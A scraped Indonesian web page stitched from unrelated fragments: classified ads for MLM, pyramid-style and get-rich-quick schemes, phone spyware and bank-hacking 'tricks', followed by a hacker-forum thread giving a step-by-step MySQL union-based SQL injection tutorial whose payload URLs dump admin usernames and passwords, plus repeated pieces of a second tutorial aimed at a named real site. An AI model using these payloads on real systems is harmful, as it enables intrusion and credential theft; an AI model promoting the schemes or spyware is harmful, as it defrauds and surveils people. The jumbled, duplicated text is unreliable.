RAHASIA TERHEBAT mendapatkan uang Rp. 10.000.000 dan ISI ULANG PULSA GRATIS Rp.
1.000.000 kurang dari 24 jam….. Rahasia dari sistem ini bisa di gunakan oleh seluruh provider
seluler di Indonesia baik GSM maupun CDMA.. 100 % TERBUKTI DAN BERHASIL uang dan
pulsa gratis bisa mengalir secara otomatis ke rekening dan HP anda setiap hari BUKTIKAN
SEKARANG JUGA
TRIK ALIRKAN RATUSAN RIBU SD JUTAAN RUPIAH.HARI LANGSUNG KE REKENING
ANDA SANGAT MUDAH !!!!!!!!!!!
Pemula saja bisa !! anda sudah bisa memiliki bisnis online sendiri dengan komisi 100% tanpa repot
bikin web,upload script,bikin e-book dll !!! buruan daftar secepatnya
URUS IZIN USAHA
Dibaca: 243 kali | Kategori: Alat Kantor
PT. LEGALITAS SARANAIZIN INDONESIA bergerak dibidang pengurusan perijinan usaha (set
start up company) perijinan antara lain: 1. PENDIRIAN PMA / BKPM 2. PENDIRIAN PT , CV /
PMDN, 3. PERUBAHAN AKTE NOTARIS 4. IZIN IMPORTIR APIU, APIP (DINAS DAN
BKPM) PERATURAN NO: 45/M-DAG/PER/9/2009 5. SRP – SURAT REGISTRASI PABEAN /
NIK NOMOR IDENTITAS KEPABEANAN. Penerbitan Baru, Ditolak, Diblokir,…
JUAL TONER RICOH MPC 3000E
KAMI MENJUAL TONER ORIGINAL DENGAN HARGA MURAH COCOK UNTUK FOTO
COPY WARNA MEREK : 1. RICOH : MPC2500, MPC3000 2. GESTETNER : MPC2500,
MPC3000,DSC525 DAN DSC530 3. SAVING : C2525, C3030 4. LINEAR : LD425C, LD430C
HUB. 087870573546 / IBU MARIA – BOGOR
BISNIS TERBARU 2010 TIDAK HARUS REKRUT.
BISNIS ini dirancang dengan sistem yang sangat menguntungkan, mampu hasilkan jutaan rupiah
kerekening anda dengan sendirinya. BUKTIKAN…, !!!! BARU LOUNCING..!!!
KESEMPATAN…!!! buruan ambil posisi anda,,,!!! Tampa rekrut member sekalipun.
MLM PULSA TERBAIK!
Inilah MLM Pulsa Terbaik! Paling Inovatif dan Menguntungkan Member. Ada Bonus Re-entry
Pulsa, di mana Downline bisa jadi Upline dan Upline bida jadi Downline, tergantung waktu
transaksi pulsa.
EBOOK PANDUAN MENJADI DIAMOND MLM
Apalah artinya uang 90 ribu rupiah. klo dalam waktu 5 tahun ke depan anda bisa menjadi
DIAMOND MLM dengan penghasilan pasif income puluhan juta bahkan ratusan juta rupiah per
bulan. saya Dicky Heranta berani menjamin pada anda klo dalam waktu 5 tahun ke depan setelah
anda benar benar dan sungguh sungguh menerapkan semua isi EBOOK PANDUAN MENJADI
DIAMOND MLM dan bonus 4 ebook GRATIS, anda belum menjadi DIAMOND atau minimal
dapat pasif income dari perusahaan MLM anda, saya Dicky Heranta akan kembalikan…
INGIN DOWNLOAD RATUSAN BONUS 100 % GRATIS TIS TIS ?!! KLIK DISINI
Kami sediakan RATUSAN link download 100 % GRATIS untuk anda. BENAR- BENAR
GRATIS… TANPA BIAYA SEPESERPUN ! Selain itu, jika berminat anda juga bisa dapatkan
SOLUSI BISNIS ONLINE anda di web kami. Silahkan anda buktikan !
>>> ILMU Gendam Mafia/ILMU RAJA Jalanan,TEMUKAN 5 SENJATA Rahasia Ampuh Ilmu
GENDAM…!!! :)_>
Dibaca: 715 kali | Kategori: Lain-lain
Menghilangkan kesadaran seketika orang jadi bingung/linglung,apa yang kita minta semua di
berikan,orang tunduk tak bisa bicara seperti patung.di ajarkan lima jenis ILMU GENDAM mafia
untuk tingkat profesional, {1} gendam jabat tangan, {2} gendam cablek/tepukan, {3} gendam
tatapan tanpa menyentuh, {4} gendam suara bisa jarak jauh lewat Hp. http://rasajati.wordpress.com/
Inovasi Baru Bisnis Online Dengan Konsep Yang Luar Biasa…!!!
DENGAN INNOVASI SISTEM PLAN PALING REVOLUSIONER, UANG ANDA AKAN
BERTAMBAH Dari Rp. 250.000,- Menjadi Total Rp. 10.000.000,- LANGSUNG CASH/TUNAI
TANPA DICICIL menggunakan Tabel Tahapan Persentase, TANPA ADA Pengelompokan GRUP,
Tanpa Kerja Keras, Tanpa Cari Downline, Tanpa Jualan, Tanpa Terkecuali. TANPA SYARAT dan
KETENTUAN APAPUN. SATU-SATUNYAN PROGRAM YANG…
***>>>asetBCA(dot)com, modal 10ribu hasil PASTI 22Juta/4 BLN!!
Dapatkan 22juta atau lebih hanya dalam waktu 4 bulan atau kurang dengan modal hanya Rp.10.000
saja!! hasil langsung di transfer ke rekening anda setiap minggunya dengan minimal
PAYOUT/pengiriman komisi 20ribu rupiah!WoOw asetBCA(dot)com adalah sebuah program yang
di kelolah sangat professional dan TERPERCAYA , ada leader dari seluruh indonesia yg bisa di
hubungi,…
BOSAN MENJALANKAN BISNIS ORANG LAIN?????
JALANIN AJA BISNIS ANDA SENDIRI MAKA ANDA BISA HASILKAN JUTAAN RUPIAH
DENGAN CARA MENJUAL INFORMASI SEDERHANA DARI INTERNET KARENA 100%
KOMISI MILK ANDA DAN BERGARANSI. ANDA TIDAK PERLU MEMBUAT WEB /
BLOG, EBOOK, HOSTING DAN DOMAIN. BENAR – BENAR TERBUKTI. SEGERA
BERGABUNG DAN JALANKAN BISNIS INI SECEPATNYA…..!!
CUMA BISA BERI BUKTI, BUKAN JANJI. TOTAL 10 JT TUNAI DI TANGAN ANDA
KAMI CUMA BISA BERIKAN BUKTI, BUKAN OMDO(OMONG DOANG) BISNIS BARU
2010 BISA MEMPERBAIKI SISTEM KEUANGAN ANDA http://smart.flazzcash.com DAFTAR
SEGERA, ISI DATA – DATA ANDA SOAL PEMBAYARAN BS BELAKANGAN, KARNA
SEMUA MEMBER DI UNTUNGKAN DGN MENDAPATKAN BANYAK BONUS-BONUS
LANGSUNG CASH KE REKENING ANDA BERLAKU MEMBER PASIF DAN
AKTIV,KEUNTUNGAN DI BAGI DENGAN CARA ADIL DAN MERATA…
Ratusan E-book,e-book Dewasa,Script, dan Paket Mesin uang untuk anda
GELO, EDAN DAN MANTAP! DIJAMIN TIDAK RUGI !! Penawaran SENSASIONAL dari
Saya hanya sebagai MEGA BONUS TERBATAS yang saya beli dari website Premium berbayar
dengan menghabiskan dana sebesar Rp. 4.420.000,- (empat juta empat ratus dua puluh ribu rupiah
yang seharusnya anda bayar kontan semuanya! tanpa bisa kredit apabila membeli tanpa bantuan
saya saat ini) Akan Saya berikan…
PANDUAN RAHASIA AGAR ORANG HANYA MAU MEMBELI PRODUK ATAU
BERGABUNG LEWAT URL WEB REPLIKA ANDA
Temukan 10 langkah cerdas + 2 jurus rahasia bagaimana cara “membujuk” dan “mempengaruhi”
orang lain agar HANYA MAU membeli produk atau bergabung lewat URL web replika
anda.Cocok bagi anda yang berbisnis reseller,afiliasi,investasi,networking dan MLM online.
Rahasia Sukses Bisnis Lahir & Batin Bersama Duta Business School ( DBS )
Ingin dapat uang dan pulsa gratis………… Mau Income Rp 5 juta per hari Klik
http://www.aktivasidbs.com/?id=henriutama PENDAFTARAN CEPAT ATAU LANGSUNG
HUBUNGI SAYA DI 08122381567, SMS ONLY
BISNIS ONLINE TEBARU 2010, DENGAN METODE BARU,, MAU??
TERGERAK DARI BANYAKNYA PENIPUAN BISNIS ONLINE SAAT INI, KAMI

MENAWARKAN SEBUAH BISNIS BARU PEMBUKA AWAL 2010. DENGAN SYSTEM
GFRS YG AKAN MEMBERIKAN ANDA DOUBLE PROVIT & MENINGKATKAN
PENJUALAN SAMPAI DENGAN 90 %. PENASARAN???. BURUAN GABUNG!!!!!! DAFTAR
GRATIS FREE MEMBER!!!!!
Sewa mobil box di jakarta
Dibaca: 150 kali | Kategori: Kendaraan
Sewa mobil Box Gran Max, siap antar barang pameran / catering / pindahan / dagang sampai tujuan
dengan tarif hemat Rp.200.000 khusus utk DKI. Untuk luar kota (nego) by call.
SEGERA HADIR APRIL 2010 BISNIS MBN INDONESIA
PROFIT SHARING GOLD MEMBER Dibayarkan setiap bulan hingga mencapai Rp.5.000.000
PROFIT SHARING PLATINUM MEMBER Dibayarkan setiap bulan hingga mencapai
Rp.20.000.000 SALAH SATU YANG DAHSYAT Bonus Multiple Pairing. tidak mengharuskan
keseimbangan pada jaringan anda. Dengan satu jalur atau 1 kaki aktif andapun bisa mendapatkan
bonus optimal.
[JUAL] SOFTWARE PENYADAP HP GSM FULL FEATURE [DEWASPY.COM]
Dibaca: 541 kali | Kategori: Software & Game
[DEWASPY.COM] SUPPLIER TERBESAR JASA PEMBUATAN SOFTWARE PENYADAP

HANDPHONE DENGAN JAMINAN HARGA TERMURAH & FITUR TERLENGKAP. [ALL
IN ONE SPY SOFTWARE] 1. SADAP SUARA SEKITAR HP TARGET. 2. SADAP
PERCAKAPAN PANGGILAN TELEPON SECARA LIVE. 3. MEMBACA SEMUA SMS
IN/OUT. 4. MENDAPATKAN PEMBERITAHUAN NO HP TARGET SETIAP KALI TARGET
GANTI SIMCARD. 5. SMS COMMAND. 6. GPS TRACKING. 7. BERLAKU…
JADI PERKASA SECARA ALAMI ITU TIDAK SULIT, ANDAI ANDA TAHU RAHASIA
BESARNYA !
Dibaca: 11,022 kali | Kategori: Pengobatan-Kesehatan
Sudah saatnya anda perkasa tanpa obat, tanpa olah tubuh seperti : senam keggel, olah nafas, latihan-
latihan khusus lainnya yang butuh waktu dan ketelatenan dan belum tentu hasilnya. Pada intinya
tidak ada pria yang tidak perkasa, semua bisa jadi perkasa asal tahu caranya bahkan bersifat
permanen, perkasa terus tinggal kemauan anda dan pasangan mau berapa ronde ! Tidak ada di
web…
Dollar MUDAH MIN 125 USD =1,3 JUTA, HANYA DALAM 24 JAM!! DiJAMIN!!!
Dibaca: 2,560 kali | Kategori: Bisnis Online
Ya Saya Tidak Bercanda!!, Dapatkan segera dollar mudah,langsung transfer ke rek PayPal Anda!!
Sekaligus kesempatan mendapatkan penghasilan online dari 8 Perusahaan internasional tekemuka;
CLICKBANK,MYLIFE,HDPUBLISHING,GOOGLE ADSENSE, GDI,GVO,
HOSTGATOR,Referral ACME! Tunggu Apalagi,segera lihat bukti pembayaran di blog saya,dan
JOIN Langsung!! Dapatkan ebook panduan nya GRATISS!!…
G-NETIC : MLM PULSA TERBARU & TERBAIK 2010
Dibaca: 292 kali | Kategori: Ponsel & Pulsa
Hadir dgn sistem trinary (3kaki), pertumbuhan 2Xlipat binary. Cukup rekrut 3 org atau join 4hb
langsung pasif income selamanya. pulsa murah, trx cepat & lancar. Index 1, flush out 30psg/hr/hb,
potensi bonus pasangan 1,2juta/hr/hb, bns sponsor 30rb, bns pasangan 40rb, bonus titik, royalty
margin pulsa, royalty kehormatan. rekrut 10 org langsung dapet hp. untuk kemajuan jaringan…
DITAWARKAN: TRIK TAMBAH SALDO ATM REKENING BANK ANDA TANPA HARUS
MENABUNG LAGI SECARA OTOMATIS SETIAP HARINYA 24 JAM
KAMI TAWARKAN SEBUAH RAHASIA BAGAIMANA SALDO ATM ANDA BISA

BERTAMBAH SETIAP HARINYA, MINIMAL SALDO ANDA BISA BRTAMBAH 1 – 5 JUTA
PERHARI, JIKA ANDA PANDAI MENJALANKANNYA BISA NAMBAH SALDO LEBIH
DARI 5 JUTA PERHARINYA. BERLAKU UNTUK SEMUA KARTU ATM DI
INDONESIA.,TRIK INI SUDAH DIUJI COBA SELAMA 3 BULAN DAN 100%
BERHASIL.SANGAT MUDAH DIJALANKANNYA, SISTEMATIS, TIDAK MERUGIKAN…
Peluang Bisnis Yang Luar Biasa Tahun 2010
Raih peluang bisnis di internet bersama Bisnis keagenan Pulsa DBS (duta Bisnis School) yang
memberikan keuntungan finansial melimpah dengan kerja cerdas dan pasif income Rp 1-5 jt/hr dan
pulsa gratis Rp 90 rb/hr langsung ke Rek Bank Anda dan ke HP Anda, Perusahaan dengan sertifikat
halal MUI, nyata dan terpercaya, telah jutaan rekan-rekan muda yang sukses melalui program DBS
ini.…
ASCII CODE digunakan Hacker untuk penyusupan BANK ONLINE
Simak langkah – langkah detailnya, cara penyusupan hacker di BANK online menggunakan ASCII
CODE. Dan bagaimana cara mencegahnya jika terjadi pada anda. Dapatkan juga berbagai macam
kebenaran TRIK SADIS, BANK ACCOUNT SPAMMER, ATM UNLIMITED, Cara manupulasi
para bandar judi online meraup $512 kurang dari setengah jam, Cara membangun bisnis tanpa harus
menciptakan PRODUK / menulis eBook.…
CUMA 2 LANGKAH MUDAH!!!!!!
PERTAMA : Ganti data Nama,Email,Hp dan No Rekening.KEDUA : Promosikan. CUMA 2

langkah mudah untuk MENGHASILKAN UANG MELIMPAH melalui internet, Keuntungan
100% untuk anda. BUKAN Smart Machine System. Lebih dari 2 langkah tersebut, uang langsung
saya kembalikan. Anak kecilpun pasti bisa. SEGERA GABUNG SEKARANG JUGA!!!!!
mesin percetakan OFFSET BARU/BEKAS
Kami penjual mesin-mesin Percetakan terlengkap,baru dan bergaransi spt: Mesin offset dari semua
ukuran dan warna. Mesin mesin finishing: mesin potong kertas,mesin lipat, mesin jilid, mesin UV
vernish, mesin Collator/susun/komplit,mesin pon/embos dan juga mesin press cover dll Mesin-
mesin kami merupakan”HIGH QUALITY CHINA PRINTING MACHINERY” Spesifikasi dan
gambar mesin klik:www.tikinaroindonesia.com…
DAFTAR GRATIS, HARGA PULSA MURAH DAN MASUK AKAL, TIDAK ADA YANG
DIRUGIKAN DENGAN TIDAK ADA DEPOSIT MINIMAL
Dibaca: 491 kali | Kategori: Ponsel & Pulsa
Inilah kesempatan Anda untuk bisnis dengan modal dan resiko minimal. Didukung dengan sistem
yang mudah dan simple, Anda berpeluang untuk mendapatkan penghasilan tambahan sampai
dengan ratusan juta rupiah. Silakan bandingkan dengan sistem yang lain. Saya sudah coba, ternyata
mudah dan bermanfaat. Insya Allah berhasil.
Sistem Uang Meledak.. Untuk Anda Yang Mau Kaya ! Bebas Stres..
“Hanya 2 Langkah Dalam 20 Menit Uang Dapat Meledak ! Ke Rekening Bank Anda ” Saya jamin
100 % anda PASTI !! mendapatkan hasilnya.. dengan pelayanan yang PRIMA ! GARANSI 3 X
LIPAT !!.. kalau anda gagal Kenapa berani seperti itu ? Karena saya yakin ! akan KEAMPUHAN !
& KEDAHSYATAN ! sistem otomatis itu yang sebentar lagi menjadi milik anda pribadi, yang
bekerja 24 jam nonstop/hari…
CARA MUDAH & DAHSYAT DAPAT DUIT !! Bonus TERBESAR & TERCEPAT Dibayar
Harian !! Bonus Sponsor Rp. 60.000,- Pasangan Rp. 32.000,-
Dibaca: 48 kali | Kategori: Lowongan Kerja
PT. Indo Tama Solution Launching Januari 2010 Web Perusahaan www.indotama5.com Web
Support : http://stokis4.com/?ref=218 Pendaftaran : Rp. 200.000,-/Hak Usaha – Bonus Sponsor: Rp.
60.000,- (dibayar harian) – Bonus Pasangan: Rp. 32.000,- (dibayar harian) Flushing 12 unit/hari
(Bonus pasangan maksimal Rp 384.000,-/HU/Hari) – Bonus Duplikasi : Rp.10.000,- (dibayar
mingguan) – Bonus…
RAHASIA BISNIS INTERNETER DUNIA PENGHASILAN STANDAR INTERNATIONAL
TERBONGKAR JUGA!!!!
**Hallo Interneter Mania ***STOP*** Jangan Ikut Bisnis yang Tidak Jelas Asalnya** **Ikuti
Bisnis yang Terbuka, Besar dan Nyata Ini ***Modal Awal GRATIS*** Mari Kita Tingkatkan
Devisa Negara Indonesia dengan Bisnis Interneter Kelas Dunia Penghasilan Standar International
$50-125/Referer. Anda bisa menghasilkan $5000/bulan bahkan tak terhingga.Plus Hosting
Unlimited.Anda bisa…
MAHASISWA DROP OUT JADI DIAMOND MLM !!!
Saya Erik. Mahasiswa Drop Out. umur 23 tahun. salah satu pembeli Ebook Panduan Menjadi
Diamond MLM. saya distributor Tianshi. sebelum beli Ebook Panduan Menjadi Diamond MLM,
peringkat saya masih bintang 3. tapi setelah saya beli Ebook Panduan Menjadi Diamond MLM
ALHAMDULILLAH. dalam waktu 3 tahun peringkat saya sekarang sudah silver lion ato level
Diamond Tianshi.…
BARU LOUNCING MARET 2010
KESEMPATAN DATANG SEKALI.. BARU ,,, bisnis yang bekerja dengan sendirinya, mampu
hasilkan jutaan rupiah kerekening anda tanpa mencari member……, bisnis pasti tanpa janji
melainkan bukti, bekerja dengan sistem yang cerdas.
Iklan dengan kategori " Kontak Jodoh " lainnya:

Iklan # 335710 : MANTRA ILMU PELET JARAN GOYANG ASLI DAN AMPUH.
Iklan # 334922 : MENERIMA JUAL BELI CHIPS POKER HARGA NEGO
Iklan # 334877 : Dea, ” Walau aku sudah berumur tapi aku masih Anggun lho “
Iklan # 334837 : MINYAK BEDAH AURA
Iklan # 334662 : gigolo,cari
Iklan # 334572 : dating service
Iklan # 334477 : menncari cinta sejati dan istri setia
Iklan # 334410 : SPESIALIS PENGOBATAN NON MEDIS
Iklan # 333783 : PELET DAYAK jasa pelet PELET BIRAHI pelet ampuh MANTRA PELET
Iklan # 333698 : AYO TEMUKAN AKU&TANGKAP AKU…AKU ADALAH JODOH
IDAMANMU YG SLAMA INI KAMU CARI!!!
Pasang Iklan Teks & Banner
Telah Dibuka Layanan Pasang Iklan Teks & Banner di ads.iklanhouse.com. Yg Merupakan solusi
cerdas untuk mempromosikan produk atau bisnis Anda dengan harga yang murah hanya
Rp:80000/bln, iklan Anda akan kami distribusikan & tampil di seluruh jaringan kami yg berjumlah
lebih dari 70 website dgn total kunjungan diatas 50000/hari.
Dibawah ini adalah beberapa network iklan Kami yg mempunyai ribuan kunjungan/hari:
+ Iklanbarispro.com
+ Iklanmarket.com
+ Iklanbaliku.com
+ Iklanbarisgratis.net
+ iklansukses.com
+ Iklanbisnisku.com
+ Iklandunia.com
Form Pasang Iklan Gratis
Penting:
Diharap memasang iklan dikategori yg sesuai.
Dilarang memasang iklan yg sama & berulang-ulang. Kami akan segera menghapus seluruh iklan
Anda bila melanggar ketentuan diatas.
Bagian bertanda *) berarti harus Anda isi.Judul Iklan:*
Kategori Iklan:*
Website
Email
Keywords Iklan
Contoh: bisnis, iklan, promosi
Gambar:
Detail Iklan *
Peluang Bisnis
Tingkatkan Trafik & PageRank Anda Dgn Memasang Iklan Link Disini, Hanya Rp 40.000/Bulan!
Link akan ditampilkan di bawah ini di setiap halaman.
Bisnis Online
Alamak Bikin Web Makin Mudah,Murah & Menguntungkan
Bisnis Hebat Menuju Mandiri
Bisnis Yang Anda Nanti – Nantikan Hanya Disini
hasilkan uang dengan blog gratisan
Hipnotis gratis hipnotis cepat hipnotis diri
Iklan Baris Gratis
Jaman Sekarang Cari Uang Sangat Mudah!!
Pasang Iklan Baris
Sukses BISNIS dengan JARI anda
trik menjadi milyuner
Hosting & Web Design
WItchSoft, Spesialis Web Based Software & Website
Kendaraan
Anda Butuh Hidrolik, Gear pump, Pto, Kopel,Cable Control Dll….
Lain-lain
Busana Muslim
Cari Lowongan kerja
IKLAN Baris DEWASA.com
Iklan Gratis
Iklan Gratis
Indonesia Java International Destination
Konsultan Perencana Keuangan
Lowongan kerja Di Bali
Lowongan Pekerjaan
Pasang Iklan
Pasang Iklan
Perencana Keuangan
Perencanaan Keuangan Keluarga
Promosi Gratis
Saya Kaya, Saatnya Anda Sekarang Yang Kaya
Lowongan Kerja
Growing your Traffick Growing your income, instanly
Ponsel & Pulsa
Ingin Bisnis Pulsa Daftar Gratis ?
Pulsa Super Murah, trx cepat dan lancar
Properti
Jual Rumah
Rumah Dijual
Kategori Iklan
Alat Kantor
Alat Rumah Tangga
Buku & Majalah
Elektronik
Hewan Peliharaan
Kendaraan
Komputer
Lowongan Kerja
Pendidikan & Kursus
Ponsel & Pulsa
Tempat Wisata
Lain-lain
Mobil Dijual & Dicari
Motor Dijual & Dicari
Properti
Rumah & Tanah
Bisnis Online
Pengobatan & Kesehatan
Kontak Jodoh
Musik-Film-Lagu
Hosting & Web Design
Tour & Travel
Hotel & Penginapan
Software & Game
Busana & Fashion
Kredit & Perbankan
Makanan & Restoran
Waralaba & Kerjasama
Khusus Dewasa
Seni & Kerajinan
Statistik IklanIklan hari ini: 229
Iklan kemarin: 521
Total Iklan: 292589
Online Support:
We Are DevilzCrew
Devilzc0de TeaM :: Computer :: Attacking-Web Share | Actions !

My SQL Injection Step by Step
Pengirim Message
gonzhack
Asisten LAB
Jumlah posting: 69
Join date: 11.05.09
Subyek: My SQL Injection Step by Step Fri Jun 26, 2009 2:17 pm
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara
memodifikasi perintah SQL yang ada di memori aplikasi client dan juga merupakan teknik
mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Yang perlu di ketahui sebelum sql injection pada mysql:

karakter: ‘ atau -
comments: /* atau –
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x
===========
=step Satu:=
===========
carilah target
misal: [site]/berita.php?id=100
Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada
pesan error.
contoh: [site]/berita.php?id=100′ atau
[site]/berita.php?id=-100
sehingga muncul pesan error seperti berikut (masih bnyak lagi):
==========
=step Dua:=
==========
mencari dan menghitung jumlah table yang ada dalam databasenya…

gunakan perintah : order by
contoh: [site]/berita.php?id=-100+order+by+1-- atau

[site]/berita.php?id=-100+order+by+1/*
ceklah secara step by step (satupersatu)…

misal: [site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
sehingga muncul error atau hilang pesan error…

misal: [site]/berita.php?id=-100+order+by+9--
berarti yang kita ambil adalah sampai angka 8

menjadi [site]/berita.php?id=-100+order+by+8--
===========
=step Tiga:=
===========
untuk mengeluarkan angka berapa yang muncul gunakan perintah union

karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--
ok seumpama yg keluar angka 5
gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan
perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--
lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus
menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah
From+Information_schema..
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5
ini bisa menggunakan perintah From+Information_schema..
============
=step Empat:= <<<<< lewatin ajah...
============
untuk menampilkan table yg ada pada web tsb adalah

perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-
100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--
seumpama table yang muncul adalah “admin”
===========
=step Lima:=
===========
untuk menampilkan semua isi dari table tsb adalah

perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan
setelah angka terakhir
100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+wher
e+table_schema=database()--
=============
= step Enam: =
=============
perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi

perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan
setelah angka terakhir
100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns
+where+table_name=0xhexa--
pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara
mengkonversinya
website yg digunakan untuk konversi :
http://www.piclist.com/techref/ascii.htm
contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E
100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns
+where+table_name=0×61646D696E--
============
=step Tujuh:=
============
memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara
perintah concat_ws(0×3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg
keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0×3a,hasil isi
column),6,7,8+from+(nama table berasal)--
contoh kata yang keluar adalah id,username,password
100+union+select+1,2,3,4,concat_ws(0×3a,id,username,password),6,7,8+from+admin--
==============
= step Delapan:=
==============
tahap terakhir mencari halam admin atau login
selanjutnya terserah anda karena kekuasaan web ada di tangan anda…

(me gak bertanggung jawab loh..)
Untuk Lebih Jelas Bisa Download Video Tutorial Ini Beserta File MySQL Injection
DOWNLOAD
anda langsung jalankan file ” SQL Injection.html ”
(Nb. mohon maaf apabila ada salah kata atau kekurangan dalam tutorial + video ini)
Salam
Gonzhack
flyff666
Admin
Jumlah posting: 44
Join date: 30.04.09
Subyek: Re: My SQL Injection Step by Step Sat Jun 27, 2009 2:50 am
mantab .. lanjot dah ..
N4ck0
Pengunjung
Jumlah posting: 59
Join date: 21.06.09
wah mantap master
nih tutorial dan videoyang jadi dasar ane belajar

SQL Injection om
nice share yahh
gunslinger_
Asisten LAB
Jumlah posting: 184

Join date: 15.05.09
Age: 16
Lokasi: mars
wow.... keren kaka.....

nice share
gonzhack
Asisten LAB
Jumlah posting: 69
Join date: 11.05.09
Subyek: Re: My SQL Injection Step by Step Tue Jun 30, 2009 7:20 am
iyah sama' kaka
vhesckot
Pengunjung
Jumlah posting: 56
Join date: 04.06.09
Subyek: Re: My SQL Injection Step by Step Tue Jun 30, 2009 7:39 am
Wah Keren neh....

Ijin bookmark ah,,kadang2 saya masih lupa....
Heheheeee
rotlez
Pengunjung
Jumlah posting: 30
Join date: 18.06.09
Age: 19
Lokasi: Bekasi yg panaZ..
Subyek: Re: My SQL Injection Step by Step Tue Jun 30, 2009 8:40 pm
nice tutor om gonzhack......!!!
gunslinger_
Asisten LAB
Jumlah posting: 184
Join date: 15.05.09
Age: 16
Lokasi: mars
Subyek: Re: My SQL Injection Step by Step Wed Jul 08, 2009 9:24 pm
My SQL Injection Step by Step
Halaman 1 dari 1
Permissions of this forum: Anda tidak dapat menjawab topik

Devilzc0de TeaM :: Computer :: Attacking-Web
Bebas forum | © phpBB | Free forum support | Kontak | Report an abuse | Create a free blog

Kalau Apakah Cara Deface Website Gack Admin Joomla Hack Password

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Kalau Apakah Cara Deface Website Gack Admin Joomla Hack Password

Uploaded by

Copyright:

Available Formats

Agus anin andi

Yah itulah mungkin yang dapat saya ceritakan…..

Possibly related posts: (automatically generated)

Gimana sih caranya bobol web dengan mudah dan gampang

thx for shared

coba bobol kuis telkomsel

bisa bantu gak?

Thx be4, 4 infonya…

Kalau ada yang interest tolong eamil ke designcrop@yahoo.com

masih bingung tp gua akan berusaha

bisa kirim tutorial lengkap tentang hacker dan bobol web

mas q ga ngerti mksdnya itu sql injectionNya

wew kepanjangan bosss

punya cara singkatnya?

kok tutiorialnya sama percis ama

SQL Injection, step by step

Akhir-akhir ini, anda sering mendengar istilah "SQL Injection" ?

Kita akan mengambil contoh di site www.pln-wilkaltim.co.id

Langkah pertama, kita tentukan lubang mana yang bisa di-inject

Kita ambil yang termudah dulu, dengan cara input box.

Kemudian kita akan mencari nama field-field berikutnya,

Kemudian kita cari field ke tiga :

agus wardi warni

'T_ADMIN.PASSWORD' is invalid in the select list because

Lakukan langkah di atas sampai kita menemukan field terakhir.

Berikut adalah pesan error yang terjadi, jika kita mengecek

Langkah berikutnya, kita menentukan jenis struktur field-

Kita inject di kotak NIP (pass terserah) :

Berikutnya kita inject :

Kita harus mengulang perintah di atas untuk kolom yang

Langkah berikutnya, kita akan mencari isi kolom password,

Selanjutnya kita inject :

Atau kita pakai jalan pintas saja....

Lubang ke dua adalah pada bagian berita.

Ulangi langkah-langkah kita di atas sampai didapatkan :

Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan

Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.

Perkiraan saya, nama-nama partai di situs KPU yang di-hack

Yah itulah mungkin yang dapat saya ceritakan.....

BELAJAR (Jangan pernah berhenti belajar)

Bobol Web dengan Step-by-Step SQL Injection

Langkah pertama, kita tentukan lubang mana yang bisa di-inject

Kemudian kita akan mencari nama field-field berikutnya,

Kemudian kita cari field ke tiga :

Lakukan langkah di atas sampai kita menemukan field terakhir.

Berikut adalah pesan error yang terjadi, jika kita mengecek

Langkah berikutnya, kita menentukan jenis struktur field-

Kita inject di kotak NIP (pass terserah) :

Berikutnya kita inject :

Langkah berikutnya, kita akan mencari isi kolom password,

Selanjutnya kita inject :

Atau kita pakai jalan pintas saja….

Lubang ke dua adalah pada bagian berita.

Ulangi langkah-langkah kita di atas sampai didapatkan :

Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan

Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.

Perkiraan saya, nama-nama partai di situs KPU yang di-hack

Yah itulah mungkin yang dapat saya ceritakan…..

Possibly related posts: (automatically generated)

Gimana sih caranya bobol web dengan mudah dan gampang

thx for shared

coba bobol kuis telkomsel

bisa bantu gak?

Thx be4, 4 infonya…